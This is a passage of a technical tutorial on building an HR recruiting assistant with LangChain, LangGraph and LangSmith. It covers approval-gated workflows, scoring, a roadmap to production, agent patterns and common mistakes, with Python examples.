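class ReviewState(TypedDict, total=False):
    hr_decision: Literal["approved", "revise", "rejected"]


def route_after_approval(state: ReviewState) -> str:
    """Return the next node name based on HR's decision about the draft."""
    decision = state.get("hr_decision")
    if decision == "approved":
        return "send_email"
    if decision == "revise":
        return "revise_email"
    # "rejected", or anything unexpected, ends the run without side effects.
    return END


# Fixed (non-conditional) edges from the branches above.
NEXT = {
    "send_email": "update_pipeline_status",
    "update_pipeline_status": END,
    "revise_email": "wait_hr_approval",
}


def walk(decisions: list[str]) -> list[str]:
    """Replay a sequence of HR decisions and return the nodes visited."""
    node, pending = "wait_hr_approval", list(decisions)
    path = [node]
    while node != END:
        if node == "wait_hr_approval":
            node = route_after_approval({"hr_decision": pending.pop(0)})
        else:
            node = NEXT[node]
        path.append(node)
    return path


print(walk(["revise", "approved"]))
</code></pre>
<p>Treating any unexpected decision as <code>END</code> is a deliberate choice: when in doubt, the workflow stops instead of sending an email.</p>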
<hr>
<h4 id="11ltrnhbuildprototype">11. Prototype build roadmap</h4>
<p>Don't build the full HR Copilot from day one. Proceed in small versions.</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Goal</th>
<th>LangChain</th>
<th>LangGraph</th>
<th>LangSmith</th>
</tr>
</thead>
<tbody>
<tr>
<td>V1 — CV summarizer</td>
<td>Upload CV → summary JSON</td>
<td>model + prompt + structured output</td>
<td>Not needed yet</td>
<td>Enable tracing</td>
</tr>
<tr>
<td>V2 — CV-JD matcher</td>
<td>CV + JD → score + strengths + risks</td>
<td>prompt + parser + model</td>
<td>Not needed yet</td>
<td>Eval dataset</td>
</tr>
<tr>
<td>V3 — Candidate search</td>
<td>Request → search DB → top candidates</td>
<td>tool calling</td>
<td>Start using it once there are multiple steps</td>
<td>Trace tool calls</td>
</tr>
<tr>
<td>V4 — Interview email</td>
<td>Draft email → HR approves → send</td>
<td>generate draft</td>
<td>Approval workflow</td>
<td>Trace + monitor</td>
</tr>
<tr>
<td>V5 — Full HR Copilot</td>
<td>Search → Evaluate → Recommend → Draft → Approve → Send → Update → Report</td>
<td>components</td>
<td>full orchestration</td>
<td>observability + eval</td>
</tr>
</tbody>
</table>
<p>This approach gets the team results early, lowers risk, and makes quality easier to measure.</p>
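<p>Before an LLM is wired in for V2, a deterministic baseline is useful for comparison; it corresponds to the simple-rules scoring listed for the demo in section 12. A minimal sketch: the point weights, the 70-point threshold, and the JLPT ranking are arbitrary assumptions, and the output keys mirror the structured output used elsewhere in this article.</p>
<pre><code class="language-python">from typing import Optional

# JLPT levels from lowest to highest; assumes language requirements use JLPT.
JLPT_RANK = {"N5": 1, "N4": 2, "N3": 3, "N2": 4, "N1": 5}
INTERVIEW_THRESHOLD = 70  # arbitrary cut-off for the demo


def rule_score(cv_skills: list[str], cv_jlpt: Optional[str], years: float,
               required: list[str], jlpt_req: Optional[str]) -> dict:
    """Deterministic baseline: 60 points for skills, 20 for language, 20 for experience."""
    have = {s.lower() for s in cv_skills}
    matched = [s for s in required if s.lower() in have]
    missing = [s for s in required if s.lower() not in have]
    score = 60 * len(matched) / len(required) if required else 60.0
    risks = [f"Missing required skill: {s}" for s in missing]

    if jlpt_req is None or JLPT_RANK.get(cv_jlpt or "", 0) >= JLPT_RANK[jlpt_req]:
        score += 20
    else:
        risks.append(f"Japanese level below {jlpt_req}")

    score += 20 * min(years, 5) / 5  # experience counts up to 5 years

    match_score = round(score)
    return {
        "match_score": match_score,
        "recommendation": "move_to_interview" if match_score >= INTERVIEW_THRESHOLD else "hold",
        "strengths": matched,
        "risks": risks,
    }


print(rule_score(["Go", "MySQL", "AWS"], "N2", 5, ["Go", "MySQL", "AWS"], "N2"))
print(rule_score(["Go", "MySQL"], None, 3, ["Go", "MySQL", "AWS"], "N2"))
</code></pre>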
<hr>
<h4 id="12tdemotiproductioncnthayg">12. From demo to production: what needs to change?</h4>
<p>An HR Copilot demo can run on in-memory data and fake email. To run it for real, replace each part step by step.</p>
<table>
<thead>
<tr>
<th>Area</th>
<th>Demo</th>
<th>Production</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Data</strong></td>
<td>List / JSON in-memory</td>
<td>Postgres, MySQL, ATS, Google Sheet</td>
</tr>
<tr>
<td><strong>CV storage</strong></td>
<td>Sample text</td>
<td>S3, Google Drive, internal file storage</td>
</tr>
<tr>
<td><strong>Candidate search</strong></td>
<td>Filter a list by keyword</td>
<td>DB query + vector search</td>
</tr>
<tr>
<td><strong>Scoring</strong></td>
<td>Simple rules</td>
<td>LLM + structured output + evaluation</td>
</tr>
<tr>
<td><strong>Sending email</strong></td>
<td>Print / fake list</td>
<td>Gmail API / SMTP</td>
</tr>
<tr>
<td><strong>ATS updates</strong></td>
<td>Fake update</td>
<td>API ATS / Google Sheet</td>
</tr>
<tr>
<td><strong>Checkpointer</strong></td>
<td>MemorySaver</td>
<td>SQLite / Postgres checkpointer</td>
</tr>
<tr>
<td><strong>Interface</strong></td>
<td>Console</td>
<td>Web app / Slack bot</td>
</tr>
<tr>
<td><strong>Observability</strong></td>
<td>print log</td>
<td>LangSmith trace</td>
</tr>
<tr>
<td><strong>Permissions</strong></td>
<td>None yet</td>
<td>Auth + role-based permission</td>
</tr>
</tbody>
</table>
<p>In short:</p>
<pre><code class="language-text">Prototype: prove the workflow is correct.
Production: replace mocks with real systems; add permissions, tracing, evaluation, and monitoring.
</code></pre>
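<p>Those swaps are easier if the workflow depends on a small interface and receives either the demo or the production implementation. A minimal sketch with <code>typing.Protocol</code>; <code>EmailSender</code>, <code>FakeEmailSender</code>, <code>SmtpEmailSender</code>, and <code>notify_candidate</code> are hypothetical, and the SMTP host and sender address are placeholders. A Gmail API sender would implement the same <code>send</code> method.</p>
<pre><code class="language-python">import smtplib
from dataclasses import dataclass, field
from email.message import EmailMessage
from typing import Protocol


class EmailSender(Protocol):
    def send(self, to: str, subject: str, body: str) -> str: ...


@dataclass
class FakeEmailSender:
    """Demo implementation: records messages instead of sending them."""
    outbox: list[tuple[str, str, str]] = field(default_factory=list)

    def send(self, to: str, subject: str, body: str) -> str:
        self.outbox.append((to, subject, body))
        return f"fake-{len(self.outbox)}"


class SmtpEmailSender:
    """Production sketch using the standard library; host and sender are placeholders."""

    def __init__(self, host: str, sender: str) -> None:
        self.host, self.sender = host, sender

    def send(self, to: str, subject: str, body: str) -> str:
        msg = EmailMessage()
        msg["From"], msg["To"], msg["Subject"] = self.sender, to, subject
        msg.set_content(body)
        with smtplib.SMTP(self.host) as smtp:
            smtp.send_message(msg)
        return "smtp-ok"


def notify_candidate(sender: EmailSender, to: str, name: str) -> str:
    # The workflow only knows the interface, so demo and production share this code.
    return sender.send(to, "Invitation to interview", f"Hi {name}, ...")


fake = FakeEmailSender()
print(notify_candidate(fake, "a@example.com", "Nguyen Van A"), fake.outbox)
</code></pre>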
<hr>
<h3 id="phniiisosnhvkhinodngcino">PART III. COMPARISON AND WHEN TO USE WHAT</h3>
<hr>
<h4 id="13chainagentvgraphkhcnhauu">13. How do Chain, Agent, and Graph differ?</h4>
<table>
<thead>
<tr>
<th>Concept</th>
<th>In simple terms</th>
<th>When to use</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Chain</strong></td>
<td>A straight pipeline</td>
<td>Prompt → Model → Parser</td>
</tr>
<tr>
<td><strong>Agent</strong></td>
<td>The LLM decides which tool to call</td>
<td>You need flexible tool calling</td>
</tr>
<tr>
<td><strong>Graph</strong></td>
<td>A workflow with state, nodes, edges, and branches</td>
<td>Many steps, approval, resume</td>
</tr>
</tbody>
</table>
<p>HR examples:</p>
<pre><code class="language-text">Chain:
CV + JD → LLM → Score JSON

Agent:
HR asks → the agent decides on its own to search the JD, find CVs, read notes

Graph:
Search → Score → Rank → Draft Email → Wait Approval → Send → Update ATS
</code></pre>
<hr>
<h4 id="14sosnhlangchainlanggraphlangsmith">14. Comparing LangChain, LangGraph, and LangSmith</h4>
<table>
<thead>
<tr>
<th>Criterion</th>
<th>LangChain</th>
<th>LangGraph</th>
<th>LangSmith</th>
</tr>
</thead>
<tbody>
<tr>
<td>Role</td>
<td>Build apps/agents from components</td>
<td>Orchestrate stateful agent workflows</td>
<td>Observe, debug, evaluate</td>
</tr>
<tr>
<td>Core abstractions</td>
<td>Prompt, model, tool, retriever, parser, Runnable</td>
<td>Node, Edge, State, Checkpoint</td>
<td>Trace, Dataset, Evaluator, Metrics</td>
</tr>
<tr>
<td>Question it answers</td>
<td>“How do I use models, tools, and data?”</td>
<td>“Which steps does the agent go through?”</td>
<td>“What did the agent do, and where did it go wrong?”</td>
</tr>
<tr>
<td>Simple app</td>
<td>Great fit</td>
<td>Somewhat overkill</td>
<td>Useful if you want tracing</td>
</tr>
<tr>
<td>Complex workflow</td>
<td>Not enough on its own</td>
<td>Great fit</td>
<td>Essential</td>
</tr>
<tr>
<td>Human approval</td>
<td>Must be built by hand</td>
<td>Well supported</td>
<td>Observable</td>
</tr>
<tr>
<td>Evaluation</td>
<td>Not a focus</td>
<td>Not a focus</td>
<td>Core focus</td>
</tr>
<tr>
<td>Monitoring production</td>
<td>Not a focus</td>
<td>Not a focus</td>
<td>Core focus</td>
</tr>
</tbody>
</table>
<hr>
<h4 id="15khinodngg">15. When to use what?</h4>
<h5 id="chdngllmapitrctip">Just call the LLM API directly</h5>
<p>Use it when:</p>
<ul>
<li>the task is very small,</li>
<li>no tools are needed,</li>
<li>no RAG is needed,</li>
<li>no complex structured output is needed,</li>
<li>no deep tracing is needed.</li>
</ul>
<p>Example:</p>
<pre><code class="language-text">Translate an email from Japanese to Vietnamese.
</code></pre>
<h5 id="dnglangchain">Use LangChain</h5>
<p>Use it when:</p>
<ul>
<li>you need prompt templates,</li>
<li>you need structured output,</li>
<li>you need tool calling,</li>
<li>you need RAG,</li>
<li>you need a clear pipeline.</li>
</ul>
<p>Example:</p>
<pre><code class="language-text">CV + JD → score JSON
</code></pre>
<h5 id="dnglanggraph">Use LangGraph</h5>
<p>Use it when:</p>
<ul>
<li>the workflow has many steps,</li>
<li>there is branching,</li>
<li>there is state,</li>
<li>there is human approval,</li>
<li>you need to resume,</li>
<li>you need to control the flow instead of leaving it to the prompt.</li>
</ul>
<p>Example:</p>
<pre><code class="language-text">Find CVs → score → draft email → HR approves → send email → update ATS
</code></pre>
<h5 id="dnglangsmith">Use LangSmith</h5>
<p>Use it when:</p>
<ul>
<li>you want to debug,</li>
<li>you want evaluation,</li>
<li>you want to monitor cost/latency,</li>
<li>you want to observe production,</li>
<li>you want to know where the agent went wrong.</li>
</ul>
<p>Example:</p>
<pre><code class="language-text">HR reports that the AI picked the wrong candidate → open the trace to see whether the fault is in a tool, the prompt, RAG, or the model.
</code></pre>
<hr>
<h4 id="16tlangchainlanggraphgiarngframework">16. Placing LangChain / LangGraph in the wider framework landscape</h4>
<p>Beyond these three, there are many other frameworks, each with its own philosophy.</p>
<table>
<thead>
<tr>
<th>Framework</th>
<th>Core philosophy</th>
<th>Best suited for</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangGraph</strong></td>
<td>Graph / state machine</td>
<td>Multi-step workflows, state, approval</td>
</tr>
<tr>
<td><strong>LlamaIndex</strong></td>
<td>Data and RAG</td>
<td>Question-answering apps over large document collections</td>
</tr>
<tr>
<td><strong>Microsoft AutoGen</strong></td>
<td>Multi-agent conversation</td>
<td>Several agents conversing / coordinating</td>
</tr>
<tr>
<td><strong>CrewAI</strong></td>
<td>Roles and agent teams</td>
<td>Simulating a team: researcher, writer, reviewer</td>
</tr>
<tr>
<td><strong>DSPy</strong></td>
<td>Declarative programs and prompt optimization</td>
<td>Automatically optimizing pipelines/prompts</td>
</tr>
<tr>
<td><strong>Haystack</strong></td>
<td>NLP/search pipeline</td>
<td>Production search and RAG built as pipelines</td>
</tr>
</tbody>
</table>
<p>A quick compass:</p>
<ul>
<li>Mostly about <strong>controlled workflows</strong> → LangGraph.</li>
<li>Mostly about <strong>RAG / data retrieval</strong> → LlamaIndex or a LangChain retriever.</li>
<li>Mostly about <strong>conversational multi-agent setups</strong> → AutoGen.</li>
<li>You want to express the system as <strong>roles in a team</strong> → CrewAI.</li>
<li>You want <strong>automatic prompt optimization</strong> → DSPy.</li>
</ul>
<p>Note: treat this section as an orientation map only. When choosing technology for production, still check the official documentation and try a small prototype.</p>
<hr>
<h3 id="phnivdeepdivengnchodeveloper">PART IV. A SHORT DEEP DIVE FOR DEVELOPERS</h3>
<p>This part is for readers who want to go deeper. If you only need to build a prototype, feel free to skim it.</p>
<hr>
<h4 id="17reactvnglpvanghvalm">17. ReAct: a loop of thinking while acting</h4>
<p>ReAct is a foundational idea behind many modern agents.</p>
<p>Instead of having the model answer in one shot, the agent runs in a loop:</p>
<pre><code class="language-text">Reason → Act → Observe → Reason again
</code></pre>
<p>In HR Copilot:</p>
<pre><code class="language-text">Reason: Need candidates with Go, AWS, MySQL.
Act: call search_candidates().
Observe: 12 candidates found.
Reason: need to drop those without Japanese N2.
Act: call filter_candidates().
Observe: 3 candidates remain.
Reason: score them and pick the best one.
</code></pre>
<p>LangChain helps implement the tool calling. LangGraph helps turn this loop into a controlled workflow.</p>
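<p>A stripped-down version of that loop, with the LLM replaced by a scripted policy so the control flow is visible and the code runs without a model. In a real agent, <code>decide</code> would be an LLM call that returns either a tool call or a final answer; <code>decide</code>, the toy tools, and the candidate pool are hypothetical.</p>
<pre><code class="language-python">from typing import Any, Callable

# Toy candidate pool standing in for the real database.
POOL = [
    {"id": "C001", "skills": {"Go", "AWS", "MySQL"}, "jlpt": "N2"},
    {"id": "C002", "skills": {"Go", "AWS", "MySQL"}, "jlpt": "N4"},
    {"id": "C003", "skills": {"Go"}, "jlpt": "N1"},
]


def search_candidates(skills: set[str]) -> list[dict]:
    return [c for c in POOL if skills.issubset(c["skills"])]


def filter_candidates(candidates: list[dict], allowed: tuple[str, ...]) -> list[dict]:
    return [c for c in candidates if c["jlpt"] in allowed]


TOOLS: dict[str, Callable[..., Any]] = {
    "search_candidates": search_candidates,
    "filter_candidates": filter_candidates,
}


def decide(observations: list[Any]) -> tuple[str, dict]:
    """Reason: pick the next action from what has been observed so far.

    Scripted here; in a real agent this is an LLM call that returns a tool call
    or a final answer.
    """
    if not observations:
        return "search_candidates", {"skills": {"Go", "AWS", "MySQL"}}
    if len(observations) == 1:
        return "filter_candidates", {"candidates": observations[-1], "allowed": ("N1", "N2")}
    return "final_answer", {"answer": [c["id"] for c in observations[-1]]}


def react(max_steps: int = 5) -> list[str]:
    observations: list[Any] = []
    for _ in range(max_steps):
        action, args = decide(observations)            # Reason
        if action == "final_answer":
            return args["answer"]
        observations.append(TOOLS[action](**args))      # Act, then Observe
    raise RuntimeError("no final answer within max_steps")


print(react())
</code></pre>
<p>The <code>max_steps</code> cap matters: without it, a model that never produces a final answer would loop forever. Making limits and transitions like this explicit is the kind of control LangGraph adds on top of plain tool calling.</p>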
<hr>
<h4 id="18reflexionagentbitrtkinhnghim">18. Reflexion: an agent that learns from experience</h4>
<p>Reflexion is the idea that an agent can write down lessons after each run.</p>
<p>For example, after picking the wrong candidate once, the agent might store a note:</p>
<pre><code class="language-text">Next time, don't rely only on the keyword AWS in the CV.
Check whether the candidate has real production experience or only lists the skill.
</code></pre>
<p>In practice, this “memory” can be implemented with state, a memory store, checkpoints, or separate storage.</p>
<p>LangGraph does not make an agent “learn” in the sense of retraining the model. But it provides state/checkpoint infrastructure for storing information and reusing it across runs.</p>
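<p>A minimal sketch of the storage side of that idea: lessons are saved after a run and prepended to the next run's prompt. The JSON file, the per-task keys, and the helper names are assumptions; in Reflexion itself, the lesson text is written by the model after reviewing what went wrong.</p>
<pre><code class="language-python">import json
import tempfile
from pathlib import Path

DEFAULT_STORE = Path("hr_copilot_lessons.json")  # hypothetical location


def load_lessons(task: str, store: Path = DEFAULT_STORE) -> list[str]:
    if not store.exists():
        return []
    return json.loads(store.read_text(encoding="utf-8")).get(task, [])


def save_lesson(task: str, lesson: str, store: Path = DEFAULT_STORE) -> None:
    data = json.loads(store.read_text(encoding="utf-8")) if store.exists() else {}
    data.setdefault(task, []).append(lesson)
    store.write_text(json.dumps(data, ensure_ascii=False, indent=2), encoding="utf-8")


def build_prompt(task: str, request: str, store: Path = DEFAULT_STORE) -> str:
    # Prepend stored lessons so the next run can take them into account.
    lessons = load_lessons(task, store)
    if not lessons:
        return f"Task: {request}"
    bullets = "\n".join(f"- {item}" for item in lessons)
    return f"Lessons from previous runs:\n{bullets}\n\nTask: {request}"


store = Path(tempfile.mkdtemp()) / "lessons.json"
save_lesson("score_candidate",
            "Do not rely only on the keyword AWS; check for real production experience.", store)
print(build_prompt("score_candidate", "Score CV C001 for GO-BE-2026", store))
</code></pre>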
<hr>
<h4 id="19langchainrunnablevlcel">19. LangChain Runnable and LCEL</h4>
<p>If you dig deeper into LangChain, a key concept is <code>Runnable</code>.</p>
<p>Simply put, <code>Runnable</code> is a common interface for building blocks that can be executed:</p>
<ul>
<li>prompt,</li>
<li>model,</li>
<li>parser,</li>
<li>retriever,</li>
<li>tool,</li>
<li>functions you write yourself.</li>
</ul>
<p>Runnables generally share the same calling methods:</p>
<table>
<thead>
<tr>
<th>Method</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>invoke</code> / <code>ainvoke</code></td>
<td>Run on a single input</td>
</tr>
<tr>
<td><code>batch</code> / <code>abatch</code></td>
<td>Run on multiple inputs</td>
</tr>
<tr>
<td><code>stream</code> / <code>astream</code></td>
<td>Stream the result</td>
</tr>
</tbody>
</table>
<p>LCEL lets you chain runnables with the <code>|</code> operator:</p>
<pre><code class="language-python">chain = prompt | model | output_parser
</code></pre>
<p>Put plainly, LangChain tries to give AI building blocks a common “connector”, so that assembling a pipeline is as easy as snapping Lego bricks together.</p>
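<p>To see why a shared interface matters, here is a toy re-implementation of the pattern: anything with <code>invoke</code> can be composed with <code>|</code>, and <code>batch</code> comes for free. This is not LangChain's actual <code>Runnable</code> class, only an illustration of the idea; <code>Step</code>, the prompt, the fake model, and the parser are hypothetical.</p>
<pre><code class="language-python">import json
from typing import Any, Callable


class Step:
    """Toy runnable: wraps a function and supports invoke, batch, and | composition."""

    def __init__(self, fn: Callable[[Any], Any]) -> None:
        self.fn = fn

    def invoke(self, x: Any) -> Any:
        return self.fn(x)

    def batch(self, xs: list[Any]) -> list[Any]:
        return [self.invoke(x) for x in xs]

    def __or__(self, other: "Step") -> "Step":
        # a | b returns a new step that feeds a's output into b.
        return Step(lambda x: other.invoke(self.invoke(x)))


prompt = Step(lambda d: f"Rate this CV for {d['job']}: {d['cv']}")
# Fake model: returns JSON text; a real chat model would be called here.
fake_model = Step(lambda text: '{"match_score": 82}' if "AWS" in text else '{"match_score": 40}')
output_parser = Step(json.loads)

chain = prompt | fake_model | output_parser
print(chain.invoke({"job": "Senior Go", "cv": "5 years Go, AWS"}))
print(chain.batch([{"job": "Senior Go", "cv": "Go, AWS"}, {"job": "Senior Go", "cv": "Java"}]))
</code></pre>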
<hr>
<h4 id="20langgraphpregelvsuperstep">20. LangGraph, Pregel, and super-steps</h4>
<p>LangGraph draws inspiration from graph-processing models such as Pregel / BSP.</p>
<p>Roughly speaking, the graph runs in “rounds”:</p>
<pre><code class="language-text">1. Determine which nodes need to run
2. Run those nodes
3. Merge their results into the state
4. Move on to the next round
</code></pre>
<p>This execution model makes the workflow explicit about:</p>
<ul>
<li>which nodes run,</li>
<li>when the state is updated,</li>
<li>where checkpoints are saved,</li>
<li>which point execution returns to on resume.</li>
</ul>
<p>For production, note that durable execution depends on the checkpointer and on how the infrastructure is deployed. A prototype can use <code>MemorySaver</code>, but production should use more durable storage such as a SQLite or Postgres checkpointer.</p>
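<p>The round-based model can be sketched in a few lines: in each super-step, every active node reads the same state snapshot, their updates are merged only after the step, and a checkpoint is saved before the next round. This toy scheduler is not LangGraph's Pregel runtime: the nodes, the <code>EDGES</code> table, and the list standing in for a checkpointer are hypothetical, and updates here simply overwrite keys, whereas LangGraph lets a state key declare a reducer.</p>
<pre><code class="language-python">import copy
from typing import Callable

State = dict


def fetch_jd(s: State) -> State:
    return {"jd": "GO-BE-2026"}


def fetch_candidates(s: State) -> State:
    return {"candidates": ["C001", "C002"]}


def score(s: State) -> State:
    return {"scores": {c: 90 - 20 * i for i, c in enumerate(s["candidates"])}}


NODES: dict[str, Callable[[State], State]] = {
    "fetch_jd": fetch_jd, "fetch_candidates": fetch_candidates, "score": score,
}
# Which nodes are triggered after each node finishes.
EDGES = {"fetch_jd": ["score"], "fetch_candidates": ["score"], "score": []}


def run(entry: list[str], state: State, checkpoints: list) -> State:
    active, step = entry, 0
    while active:
        snapshot = copy.deepcopy(state)                       # every node sees the same snapshot
        updates = [NODES[name](snapshot) for name in active]  # conceptually parallel
        for u in updates:
            state.update(u)                                   # merge only after the step
        active = sorted({nxt for name in active for nxt in EDGES[name]})
        # Save the state plus the nodes scheduled next: what a resume would need.
        checkpoints.append({"step": step, "state": copy.deepcopy(state), "next": active})
        step += 1
    return state


cps: list = []
final = run(["fetch_jd", "fetch_candidates"], {}, cps)
print(final["scores"], [c["next"] for c in cps])
</code></pre>
<p>Resuming would mean reloading the last checkpoint's state and continuing with its <code>next</code> nodes, which is why the checkpointer needs durable storage once runs can outlive a process.</p>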
<hr>
<h4 id="21langsmithvopentelemetry">21. LangSmith and OpenTelemetry</h4>
<p>LangSmith can ingest traces from many different apps and frameworks. One reason is that it supports an observability approach based on standards such as OpenTelemetry.</p>
<p>In practice, this means:</p>
<pre><code class="language-text">You are not required to build your app with LangChain to use LangSmith.
</code></pre>
<p>If your team already uses Datadog, Grafana, or its own observability stack, LangSmith can serve as a specialized layer for AI traces and evals, while the existing system keeps handling infra/app metrics.</p>
<hr>
<h3 id="phnvlithnggpvktlun">PART V. COMMON MISTAKES AND CONCLUSION</h3>
<hr>
<h4 id="22nmlithnggpkhibuildhraitool">22. Five common mistakes when building an HR AI tool</h4>
<h5 id="li1chollmquytnhqunhiu">Mistake 1: Letting the LLM decide too much</h5>
<p>Don't let the LLM reject candidates or send emails on its own.</p>
<p>Do this instead:</p>
<pre><code class="language-text">AI proposes → HR approves → the system acts
</code></pre>
<h5 id="li2khngdngstructuredoutput">Mistake 2: Not using structured output</h5>
<p>Free text is easy to read but hard for a backend to process.</p>
<p>Use JSON/schemas for important results:</p>
<pre><code class="language-json">{
  "match_score": 82,
  "recommendation": "move_to_interview",
  "risks": ["Lacks leadership experience"]
}
</code></pre>
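<p>Structured output only pays off if the backend validates it before acting on it. A stdlib-only sketch that parses the model's JSON and checks the three fields shown above; the allowed <code>recommendation</code> values and the 0 to 100 range are assumptions. In practice a schema library such as Pydantic, or LangChain's structured-output support, can replace the hand-written checks.</p>
<pre><code class="language-python">import json

ALLOWED_RECOMMENDATIONS = {"move_to_interview", "hold", "reject"}  # assumed vocabulary


class InvalidOutput(ValueError):
    """The model's output does not match the expected structure."""


def parse_score(raw: str) -> dict:
    """Parse and validate the model's JSON before the backend uses it."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise InvalidOutput(f"not JSON: {exc}") from exc
    if not isinstance(data, dict):
        raise InvalidOutput("expected a JSON object")

    score = data.get("match_score")
    if not isinstance(score, int) or isinstance(score, bool) or score not in range(101):
        raise InvalidOutput("match_score must be an integer from 0 to 100")
    if data.get("recommendation") not in ALLOWED_RECOMMENDATIONS:
        raise InvalidOutput(f"unknown recommendation: {data.get('recommendation')!r}")
    risks = data.get("risks", [])
    if not (isinstance(risks, list) and all(isinstance(r, str) for r in risks)):
        raise InvalidOutput("risks must be a list of strings")
    return {"match_score": score, "recommendation": data["recommendation"], "risks": risks}


raw = '{"match_score": 82, "recommendation": "move_to_interview", "risks": ["Lacks leadership experience"]}'
print(parse_score(raw)["recommendation"])
</code></pre>
<p>Rejecting malformed output at this boundary means a bad generation becomes a visible error (and a trace worth inspecting) instead of a silent wrong action.</p>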
<h5 id="li3khngctrace">Mistake 3: No tracing</h5>
<p>When the AI gets it wrong and there is no trace, you are mostly guessing.</p>
<p>Turn on LangSmith early, even in the prototype.</p>
<h5 id="li4khngcevaluationdataset">Mistake 4: No evaluation dataset</h5>
<p>Don't judge AI by gut feeling. Build a dataset that covers cases such as:</p>
<ul>
<li>CVs that fit,</li>
<li>CVs that don't fit,</li>
<li>missing information,</li>
<li>requests to send email,</li>
<li>requests that need approval,</li>
<li>policy-sensitive requests.</li>
</ul>
<h5 id="li5khngkimsotquyntool">Mistake 5: Not controlling tool permissions</h5>
<p>The more dangerous the tool, the more control it needs.</p>
<pre><code class="language-text">search_candidates       → can be allowed
get_candidate_cv        → log access
send_email              → requires approval
update_pipeline_status  → requires approval / permission
send_offer_letter       → human approval mandatory
</code></pre>
<hr>
<h4 id="23ktlun">23. Conclusion</h4>
<p>If you remember only one passage, remember this one:</p>
<pre><code class="language-text">LangChain gives AI its capabilities.
LangGraph makes AI work according to a process.
LangSmith lets the team trust, debug, and improve the AI.
</code></pre>
<p>For the HR use case:</p>
<ul>
<li>Only summarizing CVs → <strong>LangChain</strong> is enough.</li>
<li>Finding candidates, scoring them, drafting emails, waiting for approval → add <strong>LangGraph</strong>.</li>
<li>Knowing why the agent went wrong, measuring quality, tracking cost/latency → use <strong>LangSmith</strong>.</li>
</ul>
<p>A pragmatic formula:</p>
<pre><code class="language-text">Fast prototype:
  LangChain + LangSmith

Workflow with approval:
  LangChain + LangGraph + LangSmith

Production agent:
  LangChain components
  + LangGraph orchestration
  + LangSmith observability/evaluation
</code></pre>
<p>The most important point: AI should not replace HR entirely.</p>
<p>AI should act as an <strong>HR Copilot</strong>:</p>
<ul>
<li>doing the repetitive parts quickly,</li>
<li>aggregating information,</li>
<li>suggesting candidates,</li>
<li>drafting emails,</li>
<li>explaining its reasoning,</li>
<li>while humans keep the final say at the important steps.</li>
</ul>
<p>A good agent is not one that “does everything by itself”. A good agent <strong>automates the parts that should be automated, knows when to stop, and leaves the important decisions under human control</strong>.</p>
<hr>
<h3 id="phlcacheatsheetthutng">Appendix A. Terminology cheat sheet</h3>
<table>
<thead>
<tr>
<th>Term</th>
<th>Short explanation</th>
<th>HR example</th>
</tr>
</thead>
<tbody>
<tr>
<td>LLM</td>
<td>Large Language Model</td>
<td>GPT/Claude reads a CV and writes an assessment</td>
</tr>
<tr>
<td>Prompt</td>
<td>Instruction sent to the LLM</td>
<td>“Evaluate this CV against the following JD”</td>
</tr>
<tr>
<td>Prompt Template</td>
<td>Prompt with variables</td>
<td><code>{cv}</code>, <code>{jd}</code>, <code>{criteria}</code></td>
</tr>
<tr>
<td>Chain</td>
<td>Linear pipeline</td>
<td>Prompt → LLM → JSON</td>
</tr>
<tr>
<td>Tool</td>
<td>A function/API the agent can call</td>
<td><code>search_candidates()</code></td>
</tr>
<tr>
<td>RAG</td>
<td>Retrieve documents first, then answer</td>
<td>Asking about the internal recruiting policy</td>
</tr>
<tr>
<td>Retriever</td>
<td>Component that finds relevant documents</td>
<td>Search JD/policy/CV notes</td>
</tr>
<tr>
<td>Agent</td>
<td>The LLM decides the next step/tool</td>
<td>Find candidates, then draft an email</td>
</tr>
<tr>
<td>State</td>
<td>The workflow's current data</td>
<td>JD, candidates, score, email draft</td>
</tr>
<tr>
<td>Node</td>
<td>One step in the graph</td>
<td><code>score_candidates</code></td>
</tr>
<tr>
<td>Edge</td>
<td>Connection between nodes</td>
<td>high score → draft email</td>
</tr>
<tr>
<td>Conditional Edge</td>
<td>Branching on a condition</td>
<td>approve → send, reject → stop</td>
</tr>
<tr>
<td>Checkpoint</td>
<td>Saves state so the run can resume</td>
<td>Waiting for HR to approve an email</td>
</tr>
<tr>
<td>Trace</td>
<td>Detailed log of the whole execution</td>
<td>See which tools the agent called</td>
</tr>
<tr>
<td>Evaluation</td>
<td>Testing agent quality</td>
<td>Sample CV/JD dataset</td>
</tr>
<tr>
<td>Monitoring</td>
<td>Production monitoring</td>
<td>cost, latency, error rate</td>
</tr>
</tbody>
</table>
<hr>
<h3 id="phlcbngunthamkho">Appendix B. References</h3>
<h4 id="tiliuchnhthc">Official documentation</h4>
<ul>
<li>LangChain GitHub: <a href="https://github.com/langchain-ai/langchain">https://github.com/langchain-ai/langchain</a></li>
<li>LangGraph Overview: <a href="https://docs.langchain.com/oss/python/langgraph/overview">https://docs.langchain.com/oss/python/langgraph/overview</a></li>
<li>LangSmith Overview: <a href="https://docs.langchain.com/langsmith/home">https://docs.langchain.com/langsmith/home</a></li>
<li>LangGraph Graph API: <a href="https://docs.langchain.com/oss/python/langgraph/graph-api">https://docs.langchain.com/oss/python/langgraph/graph-api</a></li>
<li>LangGraph Persistence: <a href="https://docs.langchain.com/oss/python/langgraph/persistence">https://docs.langchain.com/oss/python/langgraph/persistence</a></li>
<li>LangGraph Subgraphs: <a href="https://docs.langchain.com/oss/python/langgraph/use-subgraphs">https://docs.langchain.com/oss/python/langgraph/use-subgraphs</a></li>
<li>LangSmith Observability: <a href="https://docs.langchain.com/langsmith/observability">https://docs.langchain.com/langsmith/observability</a></li>
<li>LangSmith Evaluation: <a href="https://docs.langchain.com/langsmith/evaluation">https://docs.langchain.com/langsmith/evaluation</a></li>
</ul>
<h4 id="nntnglthuyt">Theoretical foundations</h4>
<ul>
<li>Yao et al. (2022), <em>ReAct: Synergizing Reasoning and Acting in Language Models</em>: <a href="https://arxiv.org/abs/2210.03629">https://arxiv.org/abs/2210.03629</a></li>
<li>Shinn et al. (2023), <em>Reflexion: Language Agents with Verbal Reinforcement Learning</em>: <a href="https://arxiv.org/abs/2303.11366">https://arxiv.org/abs/2303.11366</a></li>
<li>Xi et al. (2023), <em>The Rise and Potential of Large Language Model Based Agents: A Survey</em>: <a href="https://arxiv.org/abs/2309.07864">https://arxiv.org/abs/2309.07864</a></li>
</ul>
